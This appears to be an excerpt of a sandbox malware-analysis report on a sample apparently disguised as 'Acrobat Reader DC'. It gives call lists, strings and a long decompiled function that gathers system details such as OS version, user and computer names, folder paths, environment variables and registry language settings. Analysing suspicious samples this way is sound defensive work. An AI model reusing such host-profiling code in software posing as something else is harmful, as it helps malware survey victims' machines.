                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • Error opening the file, xrefs: 00428231
                                  • _, xrefs: 0040371C
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Unterminated string, xrefs: 00428348
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  • Opcode ID: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                  • Opcode Fuzzy Hash: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004720DB Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004720DB(void* __eflags, void* __fp0, long _a4, struct HDC__* _a8, char _a12) {
				signed int _v6;
				struct _SYSTEMTIME* _v8;
				struct HWND__* _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				struct tagRECT _v52;
				signed int _v56;
				char _v68;
				char _v100;
				char _v626;
				short _v628;
				char _v644;
				char _v660;
				char _v676;
				char _v684;
				char _v700;
				char _v708;
				char _v716;
				char _v732;
				char _v740;
				char _v748;
				char _v756;
				char _v772;
				char _v780;
				short _v800;
				char _v1330;
				char _v1332;
				signed int __ebx;
				struct HWND__* __edi;
				signed int __esi;
				void* _t195;
				struct HDC__* _t215;
				signed int _t229;
				void* _t233;
				void* _t235;
				void* _t241;

				_t241 = __fp0;
				_t215 = _a8;
				_v628 = 0;
				E00412F40( &_v626, 0, 0x208);
				_v1332 = 0;
				E00412F40( &_v1330, 0, 0x208);
				_t235 = _t233 + 0x18;
				_t229 = 0;
				_v8 = _a12;
				while(1) {
					_t195 = E0041313C( *((intOrPtr*)(0x491770 + _t229 * 4)), _v8);
					_t235 = _t235 + 8;
					if(_t195 == 0) {
						break;
					}
					_t229 = _t229 + 1;
					if(_t229 < 0x60) {
						continue;
					}
					break;
				}
				_t239 = _t229 - 0x60;
				if(_t229 != 0x60) {
					__eflags = _t229 - 0x5f;
					if(__eflags > 0) {
						L144:
						E00402250( &_a12);
						__eflags = 0;
						return 0;
					} else {
						switch( *((intOrPtr*)(_t229 * 4 +  &M00472DC7))) {
							case 0:
								__ecx =  *__esi;
								__edx =  *( *__esi + 4);
								__eax =  *( *__esi + 4) + __esi + 4;
								__edi =  *(E00403CC0( *( *__esi + 4) + __esi + 4) + 0x14);
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 1:
								__eax =  *__esi;
								__ecx =  *( *__esi + 4);
								__eax = __ecx + __esi + 4;
								E00403CC0(__ecx + __esi + 4) = __eax + 0x20;
								__eax = E00408E80(__ebx, __ecx, __eax);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 2:
								__edx =  &_v20;
								GetLocalTime(__edx);
								__eax = _v6 & 0x0000ffff;
								_push(_v6 & 0x0000ffff);
								_push(L"%.3d");
								__ecx =  &_v628;
								_push( &_v628);
								goto L16;
							case 3:
								__edx =  &_v644;
								 &_v684 = E00441E23( &_v644,  &_v684);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								__ecx =  &_v644;
								__eax = E00402250( &_v644);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 4:
								_t44 =  &_v772; // 0x48beb0
								__ecx = _t44;
								_t45 =  &_v756; // 0x48bec0
								__eax = E00441E23(_t45, _t45);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t46 =  &_v772; // 0x48beb0
								__ecx = _t46;
								__eax = E00402250(_t46);
								_t47 =  &_a12; // 0x48c1c0
								__ecx = _t47;
								E00402250(_t47) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 5:
								_t48 =  &_v732; // 0x48bee0
								__eax = _t48;
								_t49 =  &_v708; // 0x48bef8
								__ecx = _t49;
								__eax = E00441E23(__edx, _t49);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t50 =  &_v732; // 0x48bee0
								__ecx = _t50;
								__eax = E00402250(_t50);
								_t51 =  &_a12; // 0x48c1c8
								__ecx = _t51;
								E00402250(_t51) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 6:
								_t52 =  &_v660; // 0x48bf30
								__edx = _t52;
								_t53 =  &_v716; // 0x48bef8
								_t53 = E00441E23(_t52, _t53);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t54 =  &_v660; // 0x48bf30
								__ecx = _t54;
								__eax = E00402250(_t54);
								_t55 =  &_a12; // 0x48c1d0
								__ecx = _t55;
								E00402250(_t55) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 7:
								_t56 =  &_v676; // 0x485e8c
								__ecx = _t56;
								_t57 =  &_v780; // 0x485e24
								__eax = E00441E23(_t57, _t57);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t58 =  &_v676; // 0x485e8c
								__ecx = _t58;
								__eax = E00402250(_t58);
								_t59 =  &_a12; // 0x48613c
								__ecx = _t59;
								E00402250(_t59) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 8:
								_t60 =  &_v700; // 0x48bf10
								__eax = _t60;
								_t61 =  &_v748; // 0x48bee0
								__ecx = _t61;
								__eax = E00441E23(__edx, _t61);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t62 =  &_v700; // 0x48bf10
								__ecx = _t62;
								__eax = E00402250(_t62);
								_t63 =  &_a12; // 0x48c1d8
								__ecx = _t63;
								E00402250(_t63) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 9:
								_t64 =  &_v740; // 0x48bef0
								__edx = _t64;
								__eax = E00441E23(__edx, __edx);
								_push(__eax);
								_push(L"%d");
								_t65 =  &_v628; // 0x48bf60
								__eax = _t65;
								_push(_t65);
								L16:
								__eax = E0041329B(__edx);
								goto L17;
							case 0xa:
								__ecx =  &_v68;
								__eax = E00441E23( &_v28,  &_v28);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								__ecx =  &_v68;
								__eax = E00402250( &_v68);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0xb:
								_t70 =  &_v628; // 0x48bf68
								__eax = _t70;
								_push(_t70);
								_push(0);
								_push(0);
								_push(0x26);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xc:
								_t71 =  &_v628; // 0x48bf68
								__ecx = _t71;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x2b);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xd:
								_t72 =  &_v628; // 0x48bf68
								__edx = _t72;
								_push(_t72);
								_push(0);
								_push(0);
								_push(5);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xe:
								_t73 =  &_v628; // 0x48bf68
								__eax = _t73;
								_push(_t73);
								_push(0);
								_push(0);
								_push(0x23);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xf:
								_t74 =  &_v628; // 0x48bf68
								__ecx = _t74;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x19);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x10:
								_t75 =  &_v628; // 0x48bf68
								__edx = _t75;
								_push(_t75);
								_push(0);
								_push(0);
								_push(0x2e);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x11:
								_t76 =  &_v628; // 0x48bf68
								__eax = _t76;
								_push(_t76);
								_push(0);
								_push(0);
								_push(0x1f);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x12:
								_t77 =  &_v628; // 0x48bf68
								__ecx = _t77;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x17);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x13:
								_t78 =  &_v628; // 0x48bf68
								__edx = _t78;
								_push(_t78);
								_push(0);
								_push(0);
								_push(0x16);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x14:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x18);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x15:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x1a);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x16:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x10);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x17:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(6);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x18:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(2);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x19:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0xb);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1a:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(7);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1b:
								__ecx =  &_a4;
								__edx =  &_v628;
								_a4 = 0x104;
								__eax = GetComputerNameW( &_v628, __ecx);
								goto L18;
							case 0x1c:
								__eax =  &_v628;
								__eax = GetWindowsDirectoryW( &_v628, 0x104);
								__eflags = __eax;
								if(__eax == 0) {
									goto L144;
								} else {
									goto L18;
								}
								goto L145;
							case 0x1d:
								__ecx =  *0x4a9604;
								__eflags = __ecx[0x16];
								_push(0x104);
								__edx =  &_v628;
								_push( &_v628);
								if(__eflags == 0) {
									__eax = GetSystemDirectoryW();
								} else {
									__eax = 0;
									_v16 = 0;
									_v8 = 0;
									__eax =  &_v16;
									E00430E0D(__eflags,  &_v16) = __eax->i();
									__ecx =  &_v16;
									__eax = E00430CCB(__ecx);
								}
								goto L18;
							case 0x1e:
								L141:
								__esi = __ebx;
								goto L142;
							case 0x1f:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 6;
								goto L143;
							case 0x20:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 3;
								goto L143;
							case 0x21:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 9;
								goto L143;
							case 0x22:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 5;
								goto L143;
							case 0x23:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0xa;
								goto L143;
							case 0x24:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x40;
								goto L143;
							case 0x25:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x41;
								goto L143;
							case 0x26:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 2;
								goto L143;
							case 0x27:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 7;
								goto L143;
							case 0x28:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 8;
								goto L143;
							case 0x29:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 4;
								goto L143;
							case 0x2a:
								L128:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 1;
								goto L143;
							case 0x2b:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x42;
								goto L143;
							case 0x2c:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x43;
								goto L143;
							case 0x2d:
								__eflags =  *0x4974ea - 1;
								goto L60;
							case 0x2e:
								__eflags =  *0x4a8719 - 1;
								L60:
								__esi = __ebx;
								if(__eflags != 0) {
									L142:
									__eax = E00408F40(__edi, __esi);
									 *__ebx = 0;
								} else {
									__eax = E00408F40(__edi, __esi);
									 *__ebx = 1;
								}
								goto L143;
							case 0x2f:
								__eax =  *(__esi + 0xc8);
								goto L19;
							case 0x30:
								__eax =  *(__esi + 0xb8);
								goto L19;
							case 0x31:
								__eax =  *(__esi + 0xd8);
								goto L19;
							case 0x32:
								__eax =  *(__esi + 0xf4);
								__eax = E004348AA( *(__esi + 0xf4));
								__esi = __ebx;
								__edi = __eax;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x33:
								__ecx =  &_v628;
								__eax = GetCurrentDirectoryW(0x104, __ecx);
								goto L18;
							case 0x34:
								__eax = L"WIN32_NT";
								goto L19;
							case 0x35:
								__eax =  *0x4a9604;
								__eflags =  *((char*)(__eax + 0x2a)) - 1;
								if( *((char*)(__eax + 0x2a)) != 1) {
									__eflags =  *((char*)(__eax + 0x28)) - 1;
									if( *((char*)(__eax + 0x28)) != 1) {
										__eflags =  *((char*)(__eax + 0x26)) - 1;
										if( *((char*)(__eax + 0x26)) != 1) {
											__eflags =  *((char*)(__eax + 0x24)) - 1;
											if( *((char*)(__eax + 0x24)) != 1) {
												__eflags =  *((char*)(__eax + 0x22)) - 1;
												if( *((char*)(__eax + 0x22)) != 1) {
													__eflags =  *((char*)(__eax + 0x20)) - 1;
													if( *((char*)(__eax + 0x20)) != 1) {
														__eflags =  *((char*)(__eax + 0x1e)) - 1;
														if( *((char*)(__eax + 0x1e)) != 1) {
															__eflags =  *((char*)(__eax + 0x1c)) - 1;
															if( *((char*)(__eax + 0x1c)) != 1) {
																goto L99;
															} else {
																__eax = L"WIN_2000";
															}
														} else {
															__eflags =  *((char*)(__eax + 0x30));
															__eax = L"WIN_XPe";
															if(__eflags == 0) {
																__eax = L"WIN_XP";
															}
														}
													} else {
														__eax = L"WIN_2003";
													}
												} else {
													__eax = L"WIN_VISTA";
												}
											} else {
												__eax = L"WIN_2008";
											}
										} else {
											__eax = L"WIN_7";
										}
									} else {
										__eax = L"WIN_2008R2";
									}
								} else {
									__eax = L"WIN_8";
								}
								goto L19;
							case 0x36:
								__eax =  *0x4a9604;
								__edi =  *0x4a9604->wHour;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x37:
								__edi =  *0x4a9604;
								__edi =  &( *0x4a9604->wSecond);
								__esi = __ebx;
								__eax = E0040E6A0(__ecx,  &( *0x4a9604->wSecond), __ebx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x38:
								__esi =  &_v628;
								__edx = L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language";
								__eax = E0040F250(L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",  &_v628, 0x80000002, L"InstallLanguage", 0x104);
								L17:
								__esp = __esp + 0xc;
								goto L18;
							case 0x39:
								__edx =  *0x4a9604;
								__eax =  *( *0x4a9604 + 0x2e) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									__eax = L"X86";
								} else {
									__eflags = __eax - 6;
									if(__eax == 6) {
										__eax = L"IA64";
									} else {
										__eflags = __eax - 9;
										if(__eax != 9) {
											L99:
											__eax = L"UNKNOWN";
										} else {
											__eax = L"X64";
										}
									}
								}
								goto L19;
							case 0x3a:
								__ecx = 0;
								__eax = 0x80000001;
								asm("cpuid");
								__esi =  &_v68;
								 *__esi = 0x80000001;
								 *(__esi + 4) = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *(__esi + 0xc) = __edx;
								__eflags = _v56 & 0x20000000;
								__eax = L"X64";
								if((_v56 & 0x20000000) == 0) {
									__eax = L"X86";
								}
								__ebx = _a8;
								goto L19;
							case 0x3b:
								__edx =  &_v800;
								__eax = GetKeyboardLayoutNameW( &_v800);
								__eax =  &_v800;
								goto L19;
							case 0x3c:
								 &_v1332 = E00411567( &_v1332, L"3, 3, 8, 1");
								__ecx =  &_v1332;
								__esi = 0;
								__edi = 0;
								__eax = E004111C1( &_v1332);
								__eflags = __eax;
								if(__eax > 0) {
									do {
										__eax =  *(__ebp + __edi * 2 - 0x530) & 0x0000ffff;
										__eflags = __eax - 0x20;
										if(__eax != 0x20) {
											__eflags = __eax - 0x2c;
											if(__eax != 0x2c) {
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __ax;
											} else {
												__edx = 0x2e;
												 *((short*)(__ebp + __esi * 2 - 0x530)) = __dx;
											}
											__esi = __esi + 1;
											__eflags = __esi;
										}
										__eax =  &_v1332;
										__edi =  &(__edi->i);
										__eax = E004111C1( &_v1332);
										__eflags = __edi - __eax;
									} while (__edi < __eax);
								}
								__ecx = 0;
								 *((short*)(__ebp + __esi * 2 - 0x530)) = __cx;
								__eax =  &_v1332;
								goto L19;
							case 0x3d:
								__edx =  &_v628;
								__eax = GetModuleFileNameW(0,  &_v628, 0x104);
								goto L18;
							case 0x3e:
								 &_v100 = E00433493(1,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x3f:
								__ecx =  &_v100;
								__eax = E00433493(2,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x40:
								__edx =  &_v100;
								__eax = E00433493(3,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x41:
								 &_v100 = E00433493(4,  &_v100);
								__eax =  &_v100;
								goto L19;
							case 0x42:
								E0040E710("\r", _t215, _t217);
								E00402250( &_a12);
								__eflags = 0;
								return 0;
								goto L145;
							case 0x43:
								"\n" = E0040E710("\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x44:
								L"\r\n" = E0040E710(L"\r\n", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x45:
								__ecx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.right;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x46:
								__edx =  &_v52;
								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
								__edi = _v52.bottom;
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x47:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0xc);
								__esi = __ebx;
								_v8 = __eax;
								__eax = E00408F40(__edi, __ebx);
								__ecx = _a8;
								__eax = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x48:
								__edi = GetDesktopWindow();
								__eax = GetDC(__edi);
								_a8 = __eax;
								__eax = GetDeviceCaps(__eax, 0x74);
								__esi = __ebx;
								_v8 = __eax;
								E00408F40(__edi, __ebx) = _a8;
								__edx = _v8;
								 *((intOrPtr*)(__ebx + 8)) = 1;
								 *__ebx = _v8;
								__eax = ReleaseDC(__edi, _a8);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x49:
								__eax =  *0x4a7f54;
								__eflags = __eax - 3;
								if(__eax == 3) {
									goto L128;
								} else {
									__eflags = __eax - 4;
									if(__eax != 4) {
										goto L141;
									} else {
										goto L128;
									}
								}
								goto L143;
							case 0x4a:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"COMSPEC", __ecx, 0x104);
								goto L18;
							case 0x4b:
								"\t" = E0040E710("\t", __ebx, __ecx);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x4c:
								__eax =  &_a4;
								__ecx =  &_v628;
								_a4 = 0x104;
								__eax = GetUserNameW(__ecx,  &_a4);
								goto L18;
							case 0x4d:
								__edx =  &_v628;
								__eax = GetTempPathW(0x104,  &_v628);
								__esi =  &_v628;
								__eax = E00410290( &_v628, __eflags);
								goto L18;
							case 0x4e:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERPROFILE",  &_v628, 0x104);
								goto L18;
							case 0x4f:
								 &_v628 = GetEnvironmentVariableW(L"HOMEDRIVE",  &_v628, 0x104);
								goto L18;
							case 0x50:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMEPATH", __ecx, 0x104);
								goto L18;
							case 0x51:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"HOMESHARE",  &_v628, 0x104);
								goto L18;
							case 0x52:
								 &_v628 = GetEnvironmentVariableW(L"LOGONSERVER",  &_v628, 0x104);
								goto L18;
							case 0x53:
								__ecx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDOMAIN", __ecx, 0x104);
								goto L18;
							case 0x54:
								__edx =  &_v628;
								__eax = GetEnvironmentVariableW(L"USERDNSDOMAIN",  &_v628, 0x104);
								goto L18;
							case 0x55:
								goto L144;
							case 0x56:
								__edi =  *(__esi + 0x148);
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								L143:
								 *((intOrPtr*)(__ebx + 8)) = 1;
								goto L144;
							case 0x57:
								__eax =  *(__esi + 0x14c);
								goto L19;
							case 0x58:
								__eax = GetCurrentProcessId();
								_a8 = __eax;
								asm("fild dword [ebp+0xc]");
								__eflags = __eax;
								if(__eax < 0) {
									__fp0 = __fp0 +  *0x48cd18;
								}
								__esi = __ebx;
								_v12 = __fp0;
								__eax = E00408F40(__edi, __ebx);
								__fp0 = _v12;
								__ecx =  &_a12;
								 *__ebx = _v12;
								 *((intOrPtr*)(__ebx + 8)) = 3;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0x59:
								__esi =  &_v628;
								__edx = L"Control Panel\\Appearance";
								__eax = E0040F250(L"Control Panel\\Appearance",  &_v628, 0x80000001, L"SchemeLangID", 0x104);
								__eax = _v628 & 0x0000ffff;
								_a4 = _v628 & 0x0000ffff;
								__eax = E00432E88(__eax, 0, __esi, 4);
								L18:
								_t38 =  &_v628; // 0x48bf60
								__eax = _t38;
								L19:
								__eax = E0040E710(__eax, __ebx, __ecx);
								_t39 =  &_a12; // 0x48c1e0
								__ecx = _t39;
								E00402250(_t39) = 0;
								__eflags = 0;
								return 0;
								goto L145;
						}
					}
				} else {
					_t232 =  &_v36;
					E00401B10("@",  &_v36, _t239);
					_a8 = 0;
					E0040BD50(_t232, _t241,  &_a12);
					E0040C2C0(0, _t232,  &_v8,  &_a8);
					_t207 = _v8;
					if(_v8 != 0) {
						E00408E80(_t215, 0, _t207);
						E00402250( &_v36);
						E00402250( &_a12);
						__eflags = 0;
						return 0;
					} else {
						E00402250(_t232);
						E00402250( &_a12);
						return 1;
					}
				}
				L145:
			}









































                                  0x004720db
                                  0x004720e5
                                  0x004720fc
                                  0x00472103
                                  0x0047211a
                                  0x00472121
                                  0x00472129
                                  0x0047212c
                                  0x0047212e
                                  0x0047213b
                                  0x00472147
                                  0x0047214c
                                  0x00472151
                                  0x00000000
                                  0x00000000
                                  0x00472153
                                  0x00472157
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00472157
                                  0x00472159
                                  0x0047215c
                                  0x004721d1
                                  0x004721d4
                                  0x00472db4
                                  0x00472db7
                                  0x00472dbe
                                  0x00472dc4
                                  0x004721da
                                  0x004721da
                                  0x00000000
                                  0x00472255
                                  0x00472257
                                  0x0047225a
                                  0x00472263
                                  0x00472266
                                  0x00472268
                                  0x0047226d
                                  0x00000000
                                  0x00000000
                                  0x00472274
                                  0x00472276
                                  0x00472279
                                  0x00472282
                                  0x00472286
                                  0x0047228b
                                  0x00472293
                                  0x00472293
                                  0x0047229b
                                  0x00000000
                                  0x00000000
                                  0x0047229e
                                  0x004722a2
                                  0x004722a8
                                  0x004722ac
                                  0x004722ad
                                  0x004722b2
                                  0x004722b8
                                  0x00000000
                                  0x00000000
                                  0x004722e4
                                  0x004722f2
                                  0x004722fd
                                  0x004722ff
                                  0x00472301
                                  0x00472306
                                  0x0047230c
                                  0x00472311
                                  0x00472319
                                  0x00472319
                                  0x00472321
                                  0x00000000
                                  0x00000000
                                  0x00472329
                                  0x00472329
                                  0x00472330
                                  0x00472337
                                  0x00472342
                                  0x00472344
                                  0x00472346
                                  0x0047234b
                                  0x0047234b
                                  0x00472351
                                  0x00472356
                                  0x00472356
                                  0x0047235e
                                  0x0047235e
                                  0x00472366
                                  0x00000000
                                  0x00000000
                                  0x0047236e
                                  0x0047236e
                                  0x00472375
                                  0x00472375
                                  0x0047237c
                                  0x00472387
                                  0x00472389
                                  0x0047238b
                                  0x00472390
                                  0x00472390
                                  0x00472396
                                  0x0047239b
                                  0x0047239b
                                  0x004723a3
                                  0x004723a3
                                  0x004723ab
                                  0x00000000
                                  0x00000000
                                  0x004723b3
                                  0x004723b3
                                  0x004723ba
                                  0x004723c1
                                  0x004723cc
                                  0x004723ce
                                  0x004723d0
                                  0x004723d5
                                  0x004723d5
                                  0x004723db
                                  0x004723e0
                                  0x004723e0
                                  0x004723e8
                                  0x004723e8
                                  0x004723f0
                                  0x00000000
                                  0x00000000
                                  0x004723f8
                                  0x004723f8
                                  0x004723ff
                                  0x00472406
                                  0x00472411
                                  0x00472413
                                  0x00472415
                                  0x0047241a
                                  0x0047241a
                                  0x00472420
                                  0x00472425
                                  0x00472425
                                  0x0047242d
                                  0x0047242d
                                  0x00472435
                                  0x00000000
                                  0x00000000
                                  0x0047243d
                                  0x0047243d
                                  0x00472444
                                  0x00472444
                                  0x0047244b
                                  0x00472456
                                  0x00472458
                                  0x0047245a
                                  0x0047245f
                                  0x0047245f
                                  0x00472465
                                  0x0047246a
                                  0x0047246a
                                  0x00472472
                                  0x00472472
                                  0x0047247a
                                  0x00000000
                                  0x00000000
                                  0x0047247d
                                  0x0047247d
                                  0x00472484
                                  0x0047248f
                                  0x00472490
                                  0x00472495
                                  0x00472495
                                  0x0047249b
                                  0x004722b9
                                  0x004722b9
                                  0x00000000
                                  0x00000000
                                  0x004724a6
                                  0x004724ae
                                  0x004724b9
                                  0x004724bb
                                  0x004724bd
                                  0x004724c2
                                  0x004724c5
                                  0x004724ca
                                  0x004724d2
                                  0x004724d2
                                  0x004724da
                                  0x00000000
                                  0x00000000
                                  0x004724dd
                                  0x004724dd
                                  0x004724e3
                                  0x004724e4
                                  0x004724e6
                                  0x004724e8
                                  0x004724ea
                                  0x004724ec
                                  0x00000000
                                  0x00000000
                                  0x004724f7
                                  0x004724f7
                                  0x004724fd
